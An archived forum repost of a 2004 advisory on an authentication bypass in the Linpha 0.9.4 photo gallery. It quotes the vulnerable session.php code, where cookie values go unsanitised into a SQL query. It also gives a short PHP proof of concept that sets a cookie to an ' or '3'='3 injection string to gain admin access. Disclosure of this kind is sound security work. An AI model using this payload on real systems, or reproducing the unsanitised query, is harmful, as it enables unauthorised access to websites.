Linpha 0.9.4: Authentication Bypass

Full Version: Linpha 0.9.4: Authentication Bypass

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Jul 29 2004, 10:22 PM

QUOTE

/////////////////////////////////////////////////////

//// Vulnerable Program: Linpha
////
//// Url: http://linpha.sf.net
////
//// Version: 0.9.4 Latest version
////
//// Date: Today, July 28 of 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando_at_udea.edu.co

//////////////////////////////////////////////////////

I. Affected software description:

LinPHA is easy to use, multilingual, flexible photo/image
archive/album/gallery
written in PHP.
It uses a SQL database to store information about your pictures. It
comes with a
HTML based installer, so you don't need experience in setting up SQL DB

II. Bug

There is a bug in the code that allows a possible attacker to bypass the
authentication
of the linpha admin.
It can do it without using a password, you only have to modify the
cookies of the
session, and then browsing the admin.php script

The bug is located aproximately in [25] of the session.php file:

1. Sql injection allows to bypass the auth

// Read Cookie

24 if(read_config('autologin')) {

25 if(!isset($_SESSION['user_name']) &&
isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!=""&&
isset($_COOKIE["linpha_password"])&&$_COOKIE["linpha_

password"]!="")

26 {

27 $query_username = $GLOBALS['db']->Execute("SELECT
nickname, level, groups FROM ".PREFIX."users ".

28 "WHERE ID =
'".$_COOKIE["linpha_userid"]."' AND ".

29 "password =
'".$_COOKIE["linpha_password"]."'");

30

31 if($row = $query_username->FetchRow())

32 {

33 $_SESSION["REMOTE_ADDR"] =
@$_SERVER["REMOTE_ADDR"];

34 $_SESSION["user_name"] = $row[0];

35 $_SESSION["user_pass"] =
$_COOKIE["linpha_password"];

36 $_SESSION["user_level"] = $row[1];
// Store user level

37 $_SESSION["user_groups"] = $row[2];
// Store user group membership

38 }

39 else // wrong cookie

40 {

41 setcookie("linpha_userid"); // delete
cookie linpha_userid

42 setcookie("linpha_password"); // delete
cookie linpha_password

43 }

44 }

45 }

There are two cookies that are validated: linpha_userid and
linpha_password.

So,I would be get in without a password If I inject those cookies .

I wrote this lines in a test.php:

1 <?PHP

2 setcookie("linpha_userid","1",time()+86400*365,'/linpha');

3 setcookie("linpha_password","' or
'3'='3",time()+86400*365,'/linpha');

4 ?>

The script is loaded before the admin.php file, then the new cookies will
inject the query in [29].

This is posibble if the magic_quote variable is setting to Off in the
php.ini.

but anyway, these cookies should be checked before using it in the query.

ok, That's it!

III. Solution
¨¨¨¨¨¨¨¨
The main coder was contacted and the code was fixed in the cvs ;).

Source: http://seclists.org/lists/bugtraq/2004/Jul/0335.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.